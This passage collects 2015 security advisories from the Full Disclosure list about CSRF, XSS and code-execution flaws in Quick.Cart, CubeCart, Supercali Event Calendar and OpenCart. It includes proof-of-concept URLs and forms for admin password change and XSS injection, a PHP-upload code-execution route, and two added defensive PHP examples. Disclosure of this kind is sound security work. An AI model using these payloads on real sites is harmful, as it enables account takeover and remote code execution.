10/01/2015 Vendor does not plan on releasing a fix, because the optional rename 
of the admin file may mitigate this issue already
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html



[FD] Quick.Cart 6.6: CSRF

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Quick.Cart 6.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  i...@opensolution.org
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Description

None of the requests of Quick.Cart 6.6 are protected from CSRF. This means that
an attacker can perform actions for a logged-in user by getting them to visit a
website with specifically crafted HTML and JavaScript while logged in.

The interesting forms are all in the admin.php file. To add security through
obscurity, Quick.Cart suggests renaming this file, which would make it more
difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerability can be exploited via GET or POST because of a call to
extract: extract( $_GET );

3. Proof of Concept

Change Admin Password:



  
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config"; 
method="POST">
  
  
  
  


document.createElement('form').submit.call(document.getElementById('myform'));
  


Or via GET:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=tools-config&_POST[sOption]=save%20%26raquo%3B&_POST[login]=admin&_POST[pass]=123&_POST[submit]=Submit%20request

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
10/01/2015 Vendor does not plan on releasing a fix, because the optional rename 
of the admin file may mitigate this issue already
10/07/2015 Disclosed to public

Blog Reference:
http://blog.curesec.com/article/blog/QuickCart-66-CSRF-73.html


[FD] CubeCart 6.0.7: XSS

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:CubeCart 6.0.7
Fixed in:6.0.8
Fixed Version Link:  https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact:  sa...@cubecart.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Reflected XSS

Description

The search echoes a keyword it retrieves via GET inside HTML tags. It removes
HTML tags from the keyword, but it does not encode quotes, which makes it
possible to break out of the context of the current attribute and add new
attributes. An attacker can use attributes such as onmouseover to execute
JavaScript.

To execute the code, the victim needs to hover over the title image, which an
attacker may for example achieve via ClickJacking.

Proof of Concept


http://localhost/ecommerce/CubeCart-6.0.6/search.html?search[keywords]="; onmouseover="alert('xsstest')" foo="&_a=category

3. Persistent XSS

Description

The page to edit user-submitted reviews echoes user input inside HTML input
tags without encoding quotes, which makes it possible to break out of the
context of the current attribute and add new attributes.

An attacker can use attributes such as onfocus to execute JavaScript. In
combination with autofocus, a victim does not need to actually interact with
the input field for the code to execute.

Proof of Concept

 1. Write a review here: http://localhost/ecommerce/CubeCart-6.0.6/test-category/test-product.html#reviews_write
 2. Use as name or title: " autofocus onfocus="alert(1)" foo="
 3. Visit the review-edit site: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=products&node=reviews&edit=REVIEWID

4. Solution

To mitigate this issue please upgrade at least to version 6.0.8:

https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip

Please note that a newer version might already be available.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/CubeCart-607-XSS-71.html

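
An added example, not CubeCart's or TheHostingTool's code, covering both output contexts in these advisories: the TheHostingTool notice() message that lands in element content, and the CubeCart search keyword that lands in an attribute value where removing tags leaves quotes intact. The markup and inputs are constructed.

```php
<?php
// Added example, not TheHostingTool or CubeCart code: output encoding for the
// two contexts in these advisories. Markup and inputs are constructed here.

// TheHostingTool notice(): the message lands in element content. Echoing it
// raw lets any markup in $message become part of the page.
function noticeRaw(string $message, bool $good): string
{
    $color = $good ? 'green' : 'red';
    return '<div class="notice ' . $color . '">' . $message . '</div>';
}

function noticeEncoded(string $message, bool $good): string
{
    $color = $good ? 'green' : 'red';
    // Element content: < > & " ' are all encoded, so $message stays text.
    return '<div class="notice ' . $color . '">'
        . htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</div>';
}

// CubeCart search: the keyword lands in an attribute value. strip_tags()
// removes <...> sequences but leaves quotes, so the value can still close
// the attribute and append new ones such as an event handler.
function titleImageStripTags(string $keyword): string
{
    return '<img src="/images/title.png" alt="' . strip_tags($keyword) . '">';
}

function titleImageEncoded(string $keyword): string
{
    // ENT_QUOTES turns " into &quot; (and ' into &apos; under ENT_HTML5),
    // so the keyword cannot terminate the attribute.
    return '<img src="/images/title.png" alt="'
        . htmlspecialchars($keyword, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Constructed inputs mirroring the shapes in the advisories (no live payload).
$message = '<b>bold</b> & "quoted"';
$keyword = '" onmouseover="x" foo="';

echo noticeRaw($message, true), PHP_EOL;          // <b> survives as markup
echo noticeEncoded($message, true), PHP_EOL;      // &lt;b&gt; ... &quot;quoted&quot;
echo titleImageStripTags($keyword), PHP_EOL;      // alt closed, onmouseover added
echo titleImageEncoded($keyword), PHP_EOL;        // alt="&quot; onmouseover=&quot;x&quot; foo=&quot;"
```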


[FD] CubeCart 6.0.7: Code Execution

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:CubeCart 6.0.7
Fixed in:6.0.8
Fixed Version Link:  https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip
Vendor Contact:  sa...@cubecart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

When importing a language from a language file, it is only checked that the
file contains valid XML, but the original extension of the file is kept, which
makes it possible to gain code execution by uploading a file containing PHP
code.

Please note that admin credentials are required.

3. Proof of Concept

Create a language file with valid XML and a file name like en.php with PHP code
inside:



  

  

My Language
utf-8
1.0.0
5.0.0a
5.1.*
GBP
ltr

  
  

  


  


Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=settings&node=language#lang_import

And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/language/en.php?x=ls%20-alF

4. Solution

To mitigate this issue please upgrade at least to version 6.0.8:

https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip

Please note that a newer version might already be available.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html

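
As an added example that is not CubeCart's code, an import routine that checks the XML the same way but stores the file under a server-chosen name with a fixed .xml extension, so the uploaded name can never decide how the web server treats the file; the directory layout and naming rule are assumptions.

```php
<?php
// Added example, not CubeCart code: a language import is accepted only if it
// parses as XML, and it is stored under a server-chosen name with a fixed
// .xml extension, so the uploaded file's name never decides how the web
// server later treats it. Directory layout and naming rule are assumed.

function storeLanguageImport(string $uploadedName, string $contents, string $langDir): string
{
    libxml_use_internal_errors(true);
    if (simplexml_load_string($contents) === false) {
        throw new RuntimeException('upload is not well-formed XML');
    }
    // Keep only a strictly validated base name; the client's extension is
    // discarded, which is the part the advisory's issue hinges on.
    $base = pathinfo($uploadedName, PATHINFO_FILENAME);
    if (!preg_match('/^[a-z]{2}(-[A-Z]{2})?$/', $base)) {
        throw new RuntimeException('unexpected language file name');
    }
    $target = rtrim($langDir, '/') . '/' . $base . '.xml';
    if (file_put_contents($target, $contents) === false) {
        throw new RuntimeException('could not write ' . $target);
    }
    return $target;
}

// Constructed run: a temp directory stands in for the language folder.
$dir = sys_get_temp_dir() . '/lang_import_demo';
if (!is_dir($dir)) {
    mkdir($dir);
}
$xml = '<language><info><title>My Language</title><charset>utf-8</charset></info></language>';

echo storeLanguageImport('en.php', $xml, $dir), PHP_EOL;   // .../en.xml, never en.php

// Malformed XML and a name outside the naming rule are both refused.
foreach ([['en.php', '<language><info>'], ['../x.xml', $xml]] as [$name, $body]) {
    try {
        storeLanguageImport($name, $body, $dir);
    } catch (RuntimeException $e) {
        echo 'rejected ', $name, ': ', $e->getMessage(), PHP_EOL;
    }
}
```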


[FD] Supercali Event Calendar 1.0.8: XSS

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Supercali Event Calendar 1.0.8
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://supercali.inforest.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "id" GET parameter when editing a group
in Supercali Event Calendar 1.0.8. With this, it is possible to steal cookies
or inject JavaScript keyloggers.

3. Proof of Concept


http://supercali-1.0.8/supercali-1.0.8/edit_groups.php?mode=edit_group&id=alert('xss')

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-XSS-69.html



[FD] Supercali Event Calendar 1.0.8: CSRF

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Supercali Event Calendar 1.0.8
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://supercali.inforest.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which
means that an attacker can perform actions for the victim if the victim visits
an attacker controlled site while logged in.

3. Proof of Concept

Add a User:



  
http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php"; 
method="POST">
  
  
  
  
  
  

document.myform.submit();
  


4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Supercali-Event-Calendar-108-CSRF-68.html



[FD] OpenCart 2.0.3.1: CSRF

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:OpenCart 2.0.3.1
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  https://www.opencart.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

While CSRF protection exists for the actions of an admin, it does not exist for
customers. This means that customer accounts can be compromised by an attacker
if the victim visits an attacker controlled website while logged in.

This issue was already discovered in 2013 by Saadat Ullah, but new versions of
OpenCart are still vulnerable as no fix has been released.

3. Proof of Concept

Change Password:


http://localhost/opencart-2.0.3.1/upload/index.php?route=account/password";
 >



document.myform.submit();

Change profile information, including email address, which is used when logging
in:


http://localhost/opencart-2.0.3.1/upload/index.php?route=account/edit"; >







document.myform.submit();

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor points out that issue is already known, and that they do not
plan on releasing a fix
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/OpenCart-2031-CSRF-66.html


